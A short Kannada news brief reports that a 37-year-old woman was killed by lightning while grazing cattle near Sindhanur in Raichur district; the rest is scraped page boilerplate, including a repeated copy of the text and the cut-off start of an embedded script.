ರಾಯಚೂರು: ಜಿಲ್ಲೆ ಸಿಂಧನೂರು ತಾಲೂಕಿನ ರಾಮಾ ಕ್ಯಾಂಪಿನಲ್ಲಿ ಸಿಡಿಲು ಬಡಿದು ಮಹಿಳೆ ಸಾವನ್ನಪ್ಪಿರುವ ಘಟನೆ ನಡೆದಿದೆ. ಮೃತಪಟ್ಟ ಮಹಿಳೆಯನ್ನು 37 ವರ್ಷದ  ಶರಣಮ್ಮ  ಎಂದು ಗುರುತಿಸಲಾಗಿದ್ದು,  ದನ ಕಾಯಲು ಗ್ರಾಮದ ಹೊರ ವಲಯಕ್ಕೆ ತೆರಳಿದ ಸಂದರ್ಭದಲ್ಲಿ ಸಿಡಿಲು ಬಡಿದಿದ್ದರಿಂದ ಮಹಿಳೆಯ ದೇಹ ಸುಟ್ಟು ಕರಕಲಾಗಿದೆ. ಈ ಘಟನೆ ಸಿಂಧನೂರು ಗ್ರಾಮೀಣ ಪೊಲೀಸ್ ಠಾಣೆಯಲ್ಲಿ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ನಡೆದಿದೆ.

Please follow and like us:
0
http://bp9news.com/wp-content/uploads/2018/05/WhatsApp-Image-2018-05-24-at-11.48.17-AM.jpeghttp://bp9news.com/wp-content/uploads/2018/05/WhatsApp-Image-2018-05-24-at-11.48.17-AM-150x150.jpegBP9 Bureauರಾಯಚೂರುರಾಯಚೂರು: ಜಿಲ್ಲೆ ಸಿಂಧನೂರು ತಾಲೂಕಿನ ರಾಮಾ ಕ್ಯಾಂಪಿನಲ್ಲಿ ಸಿಡಿಲು ಬಡಿದು ಮಹಿಳೆ ಸಾವನ್ನಪ್ಪಿರುವ ಘಟನೆ ನಡೆದಿದೆ. ಮೃತಪಟ್ಟ ಮಹಿಳೆಯನ್ನು 37 ವರ್ಷದ  ಶರಣಮ್ಮ  ಎಂದು ಗುರುತಿಸಲಾಗಿದ್ದು,  ದನ ಕಾಯಲು ಗ್ರಾಮದ ಹೊರ ವಲಯಕ್ಕೆ ತೆರಳಿದ ಸಂದರ್ಭದಲ್ಲಿ ಸಿಡಿಲು ಬಡಿದಿದ್ದರಿಂದ ಮಹಿಳೆಯ ದೇಹ ಸುಟ್ಟು ಕರಕಲಾಗಿದೆ. ಈ ಘಟನೆ ಸಿಂಧನೂರು ಗ್ರಾಮೀಣ ಪೊಲೀಸ್ ಠಾಣೆಯಲ್ಲಿ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ನಡೆದಿದೆ. var domain = (window.location != window.parent.location)? document.referrer : document.location.href; var scpt=document.createElement('script'); var...Kannada News Portal